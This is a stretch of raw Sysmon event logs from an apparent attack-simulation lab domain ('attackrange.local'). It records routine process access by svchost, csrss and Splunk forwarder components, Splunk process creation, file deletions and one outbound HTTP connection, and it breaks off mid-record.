09:21:26.333{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980773Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:21:26.333{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980772Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:21:26.333{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980771Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:21:26.333{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980770Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:21:26.333{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980769Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:21:26.333{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980768Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:21:26.333{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980767Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:21:26.333{69CF5F33-7F27-614D-0500-00000000FD01}408424C:\Windows\system32\csrss.exe{69CF5F33-8D16-6151-077A-00000000FD01}684C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000980766Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:21:26.333{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980765Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:21:26.333{69CF5F33-7F29-614D-1D00-00000000FD01}19603060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{69CF5F33-8D16-6151-077A-00000000FD01}684C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000980764Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:21:26.318{69CF5F33-8D16-6151-077A-00000000FD01}684C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{69CF5F33-7F27-614D-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000980763Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:21:26.224{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=96E098359D516A834ADB8490CB78F62B,SHA256=C02BCD6CE395883A65946A5EAEF674590C93200CB388937956EDA8556F9C7BE6,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001054949Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:24.305{5EBD8912-8CC0-6151-1400-00000000FD01}1040C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcptruefalse10.0.1.14win-dc-429.attackrange.local54194-false93.184.220.29-80http 23542300x80000000000000001054952Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:27.878{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=20067BCB25ACCD8F30F6F28BE96B96DC,SHA256=5DF122011BD28D56ABB4C927226EBFAC7F27EAFAAEEDB2628130A20C92E1096C,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000980806Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:21:27.928{69CF5F33-8D17-6151-097A-00000000FD01}37282996C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980805Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:21:27.708{69CF5F33-7F2A-614D-2B00-00000000FD01}28562876C:\Windows\system32\conhost.exe{69CF5F33-8D17-6151-097A-00000000FD01}3728C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980804Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:21:27.708{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980803Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:21:27.708{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980802Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:21:27.708{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980801Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:21:27.708{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980800Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:21:27.708{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980799Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:21:27.708{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980798Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:21:27.708{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980797Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:21:27.708{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980796Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:21:27.708{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980795Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:21:27.708{69CF5F33-7F27-614D-0500-00000000FD01}408984C:\Windows\system32\csrss.exe{69CF5F33-8D17-6151-097A-00000000FD01}3728C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000980794Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:21:27.708{69CF5F33-7F29-614D-1D00-00000000FD01}19603060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{69CF5F33-8D17-6151-097A-00000000FD01}3728C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000980793Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:21:27.693{69CF5F33-8D17-6151-097A-00000000FD01}3728C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{69CF5F33-7F27-614D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000980792Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:21:27.365{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program 